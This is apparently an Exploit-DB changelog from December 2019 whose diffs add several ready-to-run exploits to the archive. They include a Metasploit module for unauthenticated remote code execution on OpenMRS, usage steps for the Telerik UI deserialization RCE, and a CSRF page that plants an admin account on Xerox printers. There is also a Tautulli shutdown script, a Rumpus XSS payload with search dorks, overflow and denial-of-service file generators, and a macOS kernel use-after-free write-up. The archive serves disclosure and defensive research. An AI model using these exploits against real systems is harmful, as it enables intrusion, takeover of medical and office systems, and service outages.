DB: 2019-12-19

9 changes to exploits/shellcodes

XnView 2.49.1 - 'Research' Denial of Service (PoC)
macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()

AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow

OpenMRS - Java Deserialization RCE (Metasploit)
Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
Telerik UI - Remote Code Execution via Insecure Deserialization

exploits/asp/webapps/47789.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
+# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
+# Shodan Dork: Server: Rumpus
+# Date: 2019-12-14
+# Exploit Author: Harshit Shukla, Sudeepto Roy
+# Vendor Homepage: https://www.maxum.com/
+# Tested On: Windows & Mac
+# Version: 8.2.9.1
+# CVE: CVE-2019-19368
+
+Description: 
+A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
+
+PoC:
+
+Payload: ?!'><sVg/OnLoAD=alert`1`//
+
+Vulnerable URL:
+http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
+
+Solution:
+Update to the latest version released by vendor.

exploits/aspx/webapps/47777.txt

@@ -5,7 +5,7 @@
 # Version: 1.4.5
 # Vendor Homepage: http://www.roxyfileman.com/
 # Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
-# CVE: N/A
+# CVE: CVE-2019-19731
 
 Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 
 (using custom account as application pool identity for the IIS worker process).

exploits/aspx/webapps/47793.txt

@@ -0,0 +1,50 @@
+See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).
+
+Install
+git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
+python3 -m venv env
+source env/bin/activate
+pip3 install -r requirements.txt
+
+Requirements
+This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.
+
+Usage
+Compile mixed mode assembly DLL payload
+In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.
+
+build_dll.bat sleep.c
+Upload and load payload into application via insecure deserialization
+Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.
+
+python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
+[*] Local payload name:  sleep_2019121205271355_x86.dll
+[*] Destination folder:  C:\Windows\Temp
+[*] Remote payload name: 1576142987.918625.dll
+
+{'fileInfo': {'ContentLength': 75264,
+              'ContentType': 'application/octet-stream',
+              'DateJson': '1970-01-01T00:00:00.000Z',
+              'FileName': '1576142987.918625.dll',
+              'Index': 0},
+ 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
+                                     'Telerik.Web.UI, Version=<VERSION>, '
+                                     'Culture=neutral, '
+                                     'PublicKeyToken=<TOKEN>',
+              'TempFileName': '1576142987.918625.dll'}}
+
+[*] Triggering deserialization...
+
+<title>Runtime Error</title>
+<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
+<h2> <i>Runtime Error</i> </h2></span>
+...omitted for brevity...
+
+[*] Response time: 13.01 seconds
+In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).
+
+Thanks
+@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip

exploits/hardware/webapps/47787.txt

@@ -0,0 +1,68 @@
+# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
+# Date: 2018-12-17 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.xerox.com/
+# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
+# Software : Xerox Printer
+# Product Version:  AltaLink C8035
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
+# A request to add users is made in the Device User Database form field. This request is captured by
+# the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
+# to add users is made in the Device User Database form field to the xerox.set URI. 
+# (The frmUserName value must have a unique name.)
+
+# HTTP POST Request :
+
+POST /dummypost/xerox.set HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 707
+Origin: https://XXX.XXX.XXX.XXX
+Connection: close
+Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
+Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
+Upgrade-Insecure-Requests: 1
+
+NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10
+
+# CSRF PoC HTML :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
+      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" />
+      <input type="hidden" name="isRoles" value="True" />
+      <input type="hidden" name="isPassword" value="True" />
+      <input type="hidden" name="isCreate" value="True" />
+      <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" />
+      <input type="hidden" name="limited" value="0" />
+      <input type="hidden" name="oid" value="0" />
+      <input type="hidden" name="minLength" value="1" />
+      <input type="hidden" name="maxLength" value="63" />
+      <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
+      <input type="hidden" name="isUserNameDisallowed" value="TRUE" />
+      <input type="hidden" name="isNumberRequired" value="" />
+      <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
+      <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
+      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" />
+      <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" />
+      <input type="hidden" name="frmUserName" value="ismailtasdelen" />
+      <input type="hidden" name="frmNewPassword" value="Test1234&#33;" />
+      <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" />
+      <input type="hidden" name="frmOldPassword" value="undefined" />
+      <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/linux/remote/47792.rb

@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenMRS Java Deserialization RCE',
+      'Description'    => %q(
+        OpenMRS is an open-source platform that supplies
+        users with a customizable medical record system.
+
+        There exists an object deserialization vulnerability
+        in the `webservices.rest` module used in OpenMRS Platform.
+        Unauthenticated remote code execution can be achieved
+        by sending a malicious XML payload to a Rest API endpoint
+        such as `/ws/rest/v1/concept`.
+
+        This module uses an XML payload generated with Marshalsec
+        that targets the ImageIO component of the XStream library.
+
+        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+        8 and Java 9.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nicolas Serra', # Vuln Discovery and PoC
+        'mpgn',          # PoC
+        'Shelby Pace'    # Metasploit Module
+      ],
+      'References'     =>
+       [
+         [ 'CVE', '2018-19276' ],
+         [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
+         [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
+       ],
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+       [
+         [ 'Linux',
+           {
+             'Arch'             =>  [ ARCH_X86, ARCH_X64 ],
+             'Platform'         =>  [ 'unix', 'linux' ],
+             'CmdStagerFlavor'  => 'printf'
+           }
+         ]
+       ],
+      'DisclosureDate' => '2019-02-04',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      Opt::RPORT(8081),
+      OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
+    ])
+
+    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
+  end
+
+  def check
+    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
+
+    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
+    response = res.get_html_document
+    version = response.at('body//h3')
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
+
+    version_no = version.text
+    version_no = version_no.match(/\d+\.\d+\.\d*/)
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
+
+    version_no = Gem::Version.new(version_no)
+
+    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
+      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
+    end
+
+    CheckCode::Safe
+  end
+
+  def format_payload
+    payload_data = payload.encoded.to_s.encode(xml: :text)
+    payload_arr = payload_data.split(' ', 3)
+    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
+  end
+
+  def read_payload_data(payload_cmd)
+    # payload generated with Marshalsec
+    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
+    payload_data = File.binread(erb_path)
+    payload_data = ERB.new(payload_data).result(binding)
+
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
+  end
+
+  def execute_command(cmd, opts={})
+    cmd = cmd.encode(xml: :text)
+    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
+    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
+    payload_data = read_payload_data(xml_data)
+
+    send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  rest_uri,
+      'headers'   =>  { 'Content-Type'  =>  'text/xml' },
+      'data'      =>  payload_data
+    )
+  end
+
+  def exploit
+    chk_status = check
+    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
+    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
+      fail_with(Failure::NoTarget, 'Target is not vulnerable')
+    end
+
+    cmds = generate_cmdstager(:concat_operator => '&&')
+    print_status('Sending payload...')
+    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
+  end
+end

exploits/macos/dos/47791.txt

@@ -0,0 +1,39 @@
+The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which unconditionally frees the fileproc and fileglob. This opens up a race window during which the process could manipulate those objects while they're being freed. Exploitation requires root privileges.
+
+The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in the code:
+
+	static int
+	wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
+	{
+	...
+			error = falloc(p, &fp, &indx, ctx);
+			if (error) goto cleanup;
+			fp_alloc_successful = true;
+	...
+			proc_fdlock(p);
+			procfdtbl_releasefd(p, indx, NULL);
+			fp_drop(p, indx, fp, 1);
+			proc_fdunlock(p);
+	...
+			error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
+			if (error) goto cleanup;
+	...
+	cleanup:
+			if (error) {
+				if (fp_alloc_successful) fp_free(p, indx, fp);
+	...
+	}
+
+First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(), another thread in the process could access that file descriptor via another syscall, even while wait_for_namespace_event() is still running.
+
+This is problematic because in the error path wait_for_namespace_event() (reachable if copyout() fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very special-purpose function: it will clear the file descriptor, free the fileglob, and free the fileproc, without taking into consideration whether the fileproc or fileglob are referenced anywhere else.
+
+One way to violate these expectations is to make a call to fileport_makeport() in between the proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I believe it's possible.
+
+The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is created and mounted because the only paths that reach wait_for_namespace_event() pass through the HFS driver. Next, several racer threads are created which repeatedly try to call fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally, in order to trigger the bug, another process creates and removes a directory on the mounted HFS DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was waiting for. Usually this will generate a panic with the message "a freed zone element has been modified".
+
+Tested on macOS 10.14.6 (18G87).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47791.zip

exploits/windows/dos/47786.py

@@ -0,0 +1,52 @@
+# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
+# Exploit Author : ZwX
+# Exploit Date: 2019-12-17
+# Vendor Homepage :  http://www.xnview.com
+# Link Software : https://www.xnview.com/fr/xnview/#downloads
+# Tested on OS: Windows 7
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install XnView
+2.Open the XnView for Windows tools 
+3.Run the python operating script that will create a file (poc.txt)
+4.Run the software " Tools -> Research -> A search window opens "
+5.Copy and paste the characters in the file (poc.txt)
+6.Paste the characters in the field 'File Name' and  'In' click on 'Research'
+7.XnView for Windows Crashed
+'''
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.txt,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"

exploits/windows/local/47788.py

@@ -0,0 +1,56 @@
+# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
+# Exploit Author : ZwX
+# Exploit Date: 2019-12-17
+# Vendor Homepage : http://www.avs4you.com/
+# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
+# Tested on OS: Windows 7
+
+'''
+Technical Details & Description:
+================================
+A local buffer overflow vulnerability has been discovered in tihe official AVS Audio Converter. 
+The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. 
+The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. 
+The vulnerability is marked as classic buffer overflow issue.
+
+
+Analyze Registers:
+==================
+(1e74.1b78): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
+eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
+42424242 ??              ???
+0:000> !exchain
+0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
+0012fa30: 42424242
+Invalid exception stack at 41414141
+
+
+Note: EIP & ECX  overwritten
+
+
+Proof of Concept (PoC):
+=======================
+1.Download and install AVS Audio Converter
+2.Open the AVS Audio Converter 
+3.Run the python operating script that will create a file (poc.txt)
+4.copy and paste the characters found in the file (poc.txt) in the field "Exit folder"
+5.Click on browse
+6.EIP overwritten
+'''
+
+#!/usr/bin/python
+
+buffer = "\x41" * 264
+a = "\x42" * 4
+b = "\x43" * 1000
+
+poc = buffer + a + b 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"

exploits/windows/webapps/47785.txt

@@ -0,0 +1,70 @@
+# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
+# Date: 2018-12-17 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://tautulli.com/
+# Software : https://github.com/Tautulli/Tautulli
+# Product Version: v2.1.9
+# Platform: Windows 10 (10.0.18362)
+# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
+# Vulernability Type : Cross-Site Request Forgery (ShutDown)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
+# been discovered that anonymous access can be achieved in applications that do
+# not have a user login area and that the remote media server can be shut down.
+
+# PoC Python Script :
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import requests
+
+icon = """
+ _____ __  _  _ _____ _  _ _   _   _   _   _ ___   __  ___
+|_   _/  \| || |_   _| || | | | | | | | \ / (_  | /  |/ _ \
+  | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
+  |_||_||_|\__/  |_|  \__/|___|___|_|   \_/ |___\/ |_\//_/
+     Unauthenticated Remote Code Execution
+                                   by Ismail Tasdelen
+"""
+
+print(icon)
+
+host = input("[+] HOST: ")
+port = input("[+] PORT: ")
+
+response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.
+
+if response.status_code == 200:
+    print('[✓] Success!')
+elif response.status_code != 200:
+    print('[✗] Unsuccessful!')
+else:
+    exit()
+
+# HTTP GET Request :
+
+GET /shutdown HTTP/1.1
+Host: XXX.XXX.XXX.XXX:8181
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://XXX.XXX.XXX.XXX:8181/home
+Upgrade-Insecure-Requests: 1
+
+# CSRF PoC HTML :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

files_exploits.csv

@@ -6622,6 +6622,8 @@ id,file,description,date,author,type,platform,port
 47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
 47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
 47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
+47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
+47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10843,6 +10845,7 @@ id,file,description,date,author,type,platform,port
 47775,exploits/windows/local/47775.py,"FTP Commander Pro 8.03 - Local Stack Overflow",2019-12-13,boku,local,windows,
 47779,exploits/linux/local/47779.txt,"Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds",2019-12-16,"Google Security Research",local,linux,
 47780,exploits/openbsd/local/47780.txt,"OpenBSD 6.x - Dynamic Loader Privilege Escalation",2019-12-16,"Qualys Corporation",local,openbsd,
+47788,exploits/windows/local/47788.py,"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow",2019-12-18,ZwX,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17863,6 +17866,7 @@ id,file,description,date,author,type,platform,port
 47699,exploits/php/remote/47699.rb,"Bludit - Directory Traversal Image File Upload (Metasploit)",2019-11-20,Metasploit,remote,php,
 47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
 47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
+47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42093,3 +42097,7 @@ id,file,description,date,author,type,platform,port
 47781,exploits/java/webapps/47781.txt,"Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting",2019-12-17,MTK,webapps,java,
 47782,exploits/hardware/webapps/47782.py,"Netgear R6400 - Remote Code Execution",2019-12-17,"Kevin Randall",webapps,hardware,
 47783,exploits/aspx/webapps/47783.py,"NopCommerce 4.2.0 -  Privilege Escalation",2019-12-17,"Alessandro Magnosi",webapps,aspx,
+47785,exploits/windows/webapps/47785.txt,"Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)",2019-12-18,"Ismail Tasdelen",webapps,windows,
+47787,exploits/hardware/webapps/47787.txt,"Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-18,"Ismail Tasdelen",webapps,hardware,
+47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
+47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,